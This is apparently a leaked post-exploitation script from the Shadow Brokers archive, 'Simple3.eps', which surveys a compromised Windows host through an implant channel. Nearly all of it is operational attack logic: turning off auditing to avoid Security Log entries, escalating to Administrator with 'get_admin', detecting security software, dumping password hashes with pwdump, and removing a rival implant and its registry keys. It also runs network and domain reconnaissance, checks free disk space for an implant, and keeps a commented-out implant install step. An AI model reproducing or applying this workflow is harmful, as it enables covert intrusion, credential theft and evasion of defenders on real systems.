shadowbrokers-exploits/windows/Resources/Ep/Scripts/Simple3.eps

530 lines
14 KiB
PostScript
Raw Normal View History

#####################################################
#20041029 - reworked for EP3 from old scripts, new changlog started
#####################################################
# Environment Variable to indicate whether Simple has finished
`lpsetenv -option SIMPLE -value FALSE`;
#####################################################
# Learn From the Past: Don't repeat old errors
#####################################################
#ifnot (prompt `script LearnFromThePast.eps`){
# echo "";
# echo "moving on then....";
# echo "";
#}
@echo off;
@record on;
string $ScriptsDir;
if(`getdirectory -scripts`) {
string $Dir = GetCmdData("dir");
$ScriptsDir = $Dir[0];
}else{
$ScriptsDir="E:\\resources\\ep\\scripts";
}
@record off;
`lpsetenv -option YAK -value OFF`;
@echo on;
#####################################################
# Audit Section
#####################################################
bool $auditOff = false;
if(`script disableauditing.eps`){
$auditOff = true;
}else{
$auditOff = false;
}
pause;
#####################################################
# Check Process List for Cisco Security Agent
#####################################################
`log processlist`;
pause;
#####################################################
# Elevation Section
#####################################################
@record on;
bool $sys = false;
bool $pCheck = false;
if (`whoami`){
string $sUser;
$sUser= GetCmdData("user");
`lpsetenv -option privleges -value "$sUser"`;
if ($sUser == "system") {
$sys = true;
}
}
@record off;
ifnot ($sys == true) {
# Get our current privileges
echo "Checking our current privileges...";
@record on;
bool $elevate_me = true;
string $sSys;
string $sAdmin;
echo "Get the targets name for administrator and system";
if (`wellknownid -name administrators`){
$sAdmin = GetCmdData("sid");
}
if (`wellknownid -name system`){
$sSys = GetCmdData("sid");
}
echo "Let's see if we have enough rights to move on";
$pCheck = true;
if (`processcheck -user $sSys`) {
$elevate_me = false;
echo "";
echo "You are system! Moving on...";
echo "";
}
else if (`processcheck -group $sAdmin`) {
$elevate_me = false;
echo "";
echo "You have Administrator rights! Moving on...";
echo "";
}
@record off;
ifnot ($elevate_me == false) {
echo "";
echo "Rut Roh! we're not the Admin or System...";
echo "";
ifnot (prompt "Grant local Administrator rights to current process?") {
echo "I'm guessing you have a reason for not elevating";
return false;
}
@record on;
bool $nt4a = true;
if (`systemversion`) {
int $major = GetCmdData("sysVerMajor");
if ($major != 4) {
$nt4a = false;
}
}
if ($nt4a == true){
if (prompt "Is this an NT4 terminal server?") {
echo "Unable to elevate privileges on NT4 Terminal Server";
pause;
}
}
@record off;
ifnot (`get_admin`) {
echo "Failed to grant Administrator rights to your privilege";
pause;
echo "";
echo "Administrator rights have been granted to your process";
echo "Close the \"get_admin\" channel when you no longer wish to have these rights";
echo "";
pause;
}
}
}
else {
echo "";
echo "Ok, system...Moving on...";
echo "";
pause;
}
#####################################################
# Registry Check for Win2k SP4
#####################################################
@record on;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion"`;
string $regValues;
$regValues=GetCmdData("value_data");
`local run -command "perl $ScriptsDir/../../../tools/installdate.pl $regValues[1]" -redirect installdate`;
@record off;
`background script hotfixes.eps`;
@record on;
bool $nt4 = true;
bool $xp = false;
bool $dc = false;
bool $sp = false;
if (`systemversion`) {
int $major = GetCmdData("sysVerMajor");
int $spmajor = GetCmdData("sysSPMajor");
int $minor = GetCmdData("sysVerMinor");
int $product = GetCmdData("sysProduct");
if ($major != 4) {
$nt4 = false;
}
#Added to Test for SP 4 on Win2k
if ($nt4 == false){
if ($spmajor == 4) {
$sp = true;
`lpsetenv -option ServicePack -value "SP4"`;
}
}
if ($product == 2){
$dc = true;
}
}
@record off;
#####################################################
# Monitors Section
#####################################################
`script startmonitors.eps`;
if (prompt "Run process info? *You should run normally run it*") {
`background script processdeep.eps`;
}
### moved to top of simple to check for Cisco Security Agent
#`log processlist`;
#pause;
#####################################################
# Nethide Section
#####################################################
@record on;
`getnetaddr`;
int $local_port = GetCmdData("remote_port");
string $remote_address = GetCmdData("remote_address");
@record off;
`lpsetenv -option localIP -value $remote_address`;
`lpsetenv -option localPORT -value $local_port`;
#`script nethide3.eps $local_port`;
echo "automated nethide has been temporarily disabled";
#####################################################
# IDS Detection Section
#####################################################
#if (prompt "Run the ids logger?"){
# `script idslogger.eps`;
#}
#####################################################
# Checking For YAK
#####################################################
bool $success;
@echo off;
echo "#####################################################";
echo "# Checking For YAK";
echo "#####################################################";
if (`yak verify`){
`lpsetenv -option YAK -value ON`;
echo " YAK FOUND ON TARGET!!";
echo "MUST UNINSTALL UNLESS OTHERWISE INSTRUCTED BY HIGHER POWER! ";
if(prompt "Uninstall YAK?"){
`yak collect`;
ifnot(`yak uninstall`){
echo "Uninstall Unsuccessful! WHY?";
echo "GO GET HELP!";
}else{
ifnot(`yak verify`){
echo "YAK Uninstalled! You May move on.";
`lpsetenv -option YAK -value OFF`;
}else{
echo "YAK NOT Uninstalled IEEEEEEE!";
echo "GO GET HELP!";
}
}
}
}
#check for the registry key of interest.
echo "\nChecking for YAK registry keys";
@echo on;
if (`regquery -hive L -subkey "system\\currentcontrolset\\enum\\root\\legacy_kbpnp"`) {
#registry key is still there
echo "Found YAK's registry key: HKLM\\system\\currentcontrolset\\enum\\root\\legacy_kbpnp";
if (prompt "YAK's registry key still there, would you like to remove it?") {
`regdelkey -hive L -key "system\\currentcontrolset\\enum\\root\\legacy_kbpnp" -recursive`;
#check one more time
if (`regquery -hive L -subkey "system\\currentcontrolset\\enum\\root\\legacy_kbpnp"`) {
echo "UNABLE TO REMOVE THE REGISTRY KEY. FIND HELP";
}
}
} else { echo "\n** No YAK registry key in CurrentControlSet. **\n";}
#find how many controlSet's there are
int $controlNums = 0;
echo "\nChecking all other control Sets\n";
bool $keepGoing = true;
while ($keepGoing) {
$controlNums++;
@echo off;
if (`regquery -hive L -subkey "system\\controlset00$controlNums"`) {
@echo on;
if (`regquery -hive L -subkey "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp"`) {
if (prompt "Delete out of controlset00$controlNums ?") {
`regdelkey -hive L -key "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp" -recursive`;
#check one more time
if (`regquery -hive L -subkey "system\\controlset00$controlNums\\enum\\root\\legacy_kbpnp"`) {
echo "UNABLE TO REMOVE THE REGISTRY KEY. FIND HELP";
}
}
} else { echo "\n** No YAK registry key in controlset00$controlNums. **\n\n";}
} else { $keepGoing = false; }
}
echo "\n*** YAK Registry Cleanup complete***\n";
pause;
@echo on;
#####################################################
# Machine/network Info Section
#####################################################
if ($sys== true) {
echo "getting the well known Id's now..";
`wellknownid -name administrators -local`;
`wellknownid -name system -local`;
}
`script syspath.eps`;
`background script drivercheck.eps`;
`language`;
`remotelocaltime`;
`background netmap`;
`netbios -local`;
ifnot (`route2k -print`) {
`route`;
}
`arp -print`;
#echo "not running arp at the moment";
#if ( prompt "Run script arp.eps" ){
# `script arp.eps`;
# }
# else { echo "No arp for you!"; }
ifnot (prompt `background pwdump`) {
pause;
}
if ($nt4 == false){
`ipconfig`;
echo "not running portmap or fport right now";
# if ( prompt "Run portmap -maxports 750 -handlememory 2048000?" ){
# ifnot (`portmap -maxports 750 -handlememory 2048000`) {
# echo "Portmap failed!";
# if (prompt "Do you want to run FPORT?") {
# `script fport.eps`;
# }
# }
# }
if ($xp == false){
if ($dc == true)
{
#if (prompt "Run ADGC, ADMODE, ADUSER? ** Generally say no to this, unless you have really good reason to!" ){
# echo "OK, I assume you know what you are doing...";
# `background adgc -all`;
# `admode`;
# `background aduser -all`;
#}
echo "the automated adgc check has been temp disabled .. if needed run manually";
}
}
} else {
####################
# Commands for NT 4#
####################
if (prompt "do you want to run ipconfig on the target?") {
`run -command "ipconfig.exe /all" -redirect ipconfig`;
}
echo "not running portmap or fport right now";
# if ( prompt "Run portmap -maxports 750 -handlememory 2048000?" ){
# ifnot (`portmap -maxports 750 -handlememory 2048000`) {
# echo "Portmap failed!";
# if (prompt "Do you want to run FPORT?") {
# `script fport.eps`;
# }
# }
# }
}
pause;
ifnot (`script scheduler.eps`) {
pause;
}
`memory`;
################################################################
# drive info
################################################################
bool $ok;
int $i = 0;
@record on;
string $cmd = "listdrives";
$ok = `$cmd`;
@record off;
if ( $ok ) {
string $drive_letters = GetCmdData("drive");
bool $is_unknown = GetCmdData("is_drive_unknown");
bool $is_noroot = GetCmdData("is_drive_noroot");
bool $is_removable = GetCmdData("is_drive_removable");
bool $is_fixed = GetCmdData("is_drive_fixed");
bool $is_remote = GetCmdData("is_drive_remote");
bool $is_cdrom = GetCmdData("is_drive_cdrom");
bool $is_ramdisk = GetCmdData("is_drive_ramdisk");
$i = 0;
while ($i < sizeof($drive_letters)) {
string $current_drive = $drive_letters[$i];
if ( $is_unknown[$i] == true ) {
# echo "Unknown drive: $current_drive ";
}
if ( $is_fixed[$i] == true ) {
`diskspace $current_drive `;
}
$i++;
}
} else {
echo "unable to enumerate drives";
}
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "If this is a new box, check the system drive free space";
echo "to be sure you have enough free space to install a L4.";
echo "Also take note of the memory usage.";
echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
pause;
#####################################################
# User Info Section
#####################################################
if ($auditOff){
if (prompt "Do you want the target services,users,and groups? *** Only run if auditing disabled *** "){
`background services -local`;
`background users -local`;
`background groups -local`;
`background groups -global`;
}
}else{
echo "Auditing was not disabled. Not getting the target services, users, and groups.";
echo "These commands would likely get logged as Object Accesses in the Security Log.";
}
#####################################################
# Registry Section
#####################################################
# TODO: log currentversion\\windows, background the rest
# (make parse.ep.pl parse them out of the regquery files)
`regquery -hive L -subkey "SYSTEM\\currentcontrolset\\control\\session manager\\power" -value Heuristics`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\winlogon"`;
`regquery -hive L -subkey "software\\microsoft\\windows nt\\currentversion\\windows"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\run"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonce"`;
`regquery -hive L -subkey "software\\microsoft\\windows\\currentversion\\runonceex"`;
`regquery -hive L -subkey "hardware\\description\\system\\centralprocessor" -recursive`;
#####################################################
# Level 4 Section
#####################################################
#if (prompt "Do we need to install a level 4 or upgrade an existing implant?") {
# if (prompt "Do you want to do a Level 4 install?") {
### `level4install -local psxssdll.dl_ -remote appinit.dll -match systray.exe`;
### `free level4`;
# ifnot(`install`) {
# echo "Error in installation!!!";
# pause;
# } else { `script nethide3.eps 1154`; }
#
# }
# else {
# ifnot(`upgrade`) {
# echo "Error in upgrade!!!";
# pause;
# } else { `script nethide3.eps 1154`; }
# }
#}
#####################################################
# Clean up plugins
#####################################################
#if (prompt "Do you want to free up the commonly unused plugins?"){
if ($nt4 == false){
if ($dc == true){
`free adgc`;
`free admode`;
`free aduser`;
}
`free ipconfig`;
}
`free pwdump`;
`free wellknownid`;
if ($pCheck){
`free processcheck`;
}
`free language`;
`free systemversion`;
`free remotelocaltime`;
`free scheduler`;
`free regquery`;
`free memory`;
`free services`;
`free users`;
`free groups`;
`free listdrives`;
`free diskspace`;
#}
#####################################################
# Document Section
#####################################################
#if (prompt"Do you want to run docsurvey.eps?"){
# `script docsurvey.eps`;
#}
# Environment Variable to indicate whether Simple has finished
`lpsetenv -option SIMPLE -value TRUE`;
`plugins`;
`channels`;
#####################################################
# End Script
#####################################################
return true;